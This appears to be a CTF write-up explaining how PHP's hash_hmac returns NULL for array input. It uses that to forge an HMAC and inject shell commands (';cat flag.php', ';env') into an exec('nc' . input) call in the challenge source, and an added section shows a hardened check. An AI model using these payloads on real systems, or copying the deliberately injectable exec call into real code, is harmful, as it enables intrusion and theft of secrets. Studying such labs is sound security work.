Preface
Keywords: [hash_hmac|黑猫警长]
Solution
I thought the hint would be hidden in the audio.
Turned out, after listening to the whole thing, it really is just 黑猫警长 (Black Cat Sheriff)??
Download the mp3; the source code is embedded inside it.
<?php
// Source code recovered from the mp3
if (empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])) {
    die();
}
$clandestine = getenv("clandestine");  // secret key read from the environment
if (isset($_POST['White-cat-monitor']))
    // derive a new key from user input; an array here makes hash_hmac() return NULL
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if ($hh !== $_POST['Black-Cat-Sheriff']) {
    die();
}
echo exec("nc" . $_POST['One-ear']);  // One-ear is concatenated straight into a shell command
The hash_hmac weakness
hash_hmac($algo, $data, $key)
When $data is an array, the return value is NULL.
<?php
// passing an array as $data: PHP emits a warning and the call returns NULL
var_dump(hash_hmac('sha256', array(0), 'Unknown_key'));
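As an added example (not part of the original post or of the challenge code), this is a hardened version of the same check: it rejects any field that is not a plain string before hash_hmac() sees it, refuses to continue when hash_hmac() does not return a string, and compares the tag with hash_equals() instead of !==. The field names follow the challenge; the secret and the sample requests are constructed. On PHP 8 a non-string argument makes hash_hmac() throw a TypeError instead of returning NULL, but the explicit type check fails closed on every version.

```php
<?php
// Added, hardened variant of the challenge's check (not the challenge's own code).
// Field names follow the challenge; $secret and the sample requests are constructed.

function verify_request(array $post, string $secret): bool
{
    // Fail closed on anything that is not a plain string: `field[]=x` arrives
    // as an array, which makes hash_hmac() return NULL (PHP 5/7) and would
    // silently collapse the derived key to "" in the next call.
    foreach (['Black-Cat-Sheriff', 'One-ear', 'White-cat-monitor'] as $f) {
        if (isset($post[$f]) && !is_string($post[$f])) {
            return false;
        }
    }
    if (empty($post['Black-Cat-Sheriff']) || empty($post['One-ear'])) {
        return false;
    }

    $key = $secret;
    if (isset($post['White-cat-monitor'])) {
        $key = hash_hmac('sha256', $post['White-cat-monitor'], $key);
    }
    $hh = hash_hmac('sha256', $post['One-ear'], $key);
    if (!is_string($hh)) {
        return false;          // never let a failed HMAC fall through
    }
    // Constant-time comparison instead of !==.
    return hash_equals($hh, $post['Black-Cat-Sheriff']);
}

// Constructed inputs for a quick local check.
$secret = 'constructed-secret';

$good = ['One-ear' => 'host1'];
$good['Black-Cat-Sheriff'] = hash_hmac('sha256', $good['One-ear'], $secret);
var_dump(verify_request($good, $secret));

// The array trick from the writeup: the tag would be valid for an empty key,
// but the request is now rejected before hash_hmac() ever sees the array.
$bad = [
    'White-cat-monitor' => ['x'],
    'One-ear'           => 'host1',
    'Black-Cat-Sheriff' => hash_hmac('sha256', 'host1', ''),
];
var_dump(verify_request($bad, $secret));
```

A verified One-ear value still must not be concatenated into exec() as the challenge does; validate it against a strict hostname pattern and wrap it with escapeshellarg() before any shell call.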
A directory scan turned up flag.php, so the goal is to read flag.php.
The first hash_hmac() returns NULL, so the result of the second one is predictable.
<?php
// Reproduce the server-side computation: the first hash_hmac() receives an array and
// returns NULL, so the second call is effectively keyed with "" (NULL coerced to a string)
$clandestine = hash_hmac('sha256', array(), 123);
$hh = hash_hmac('sha256', ';cat flag.php', $clandestine);
echo $hh;
04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
Payload:
White-cat-monitor[]=K1ose&Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat flag.php
The flag was printed, but submitting it to BUU was marked wrong, and it does not match BUU's usual flag format either.
After searching around, it turns out you have to read the env instead.
White-cat-monitor[]=1&Black-Cat-Sheriff=afd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791b&One-ear=;env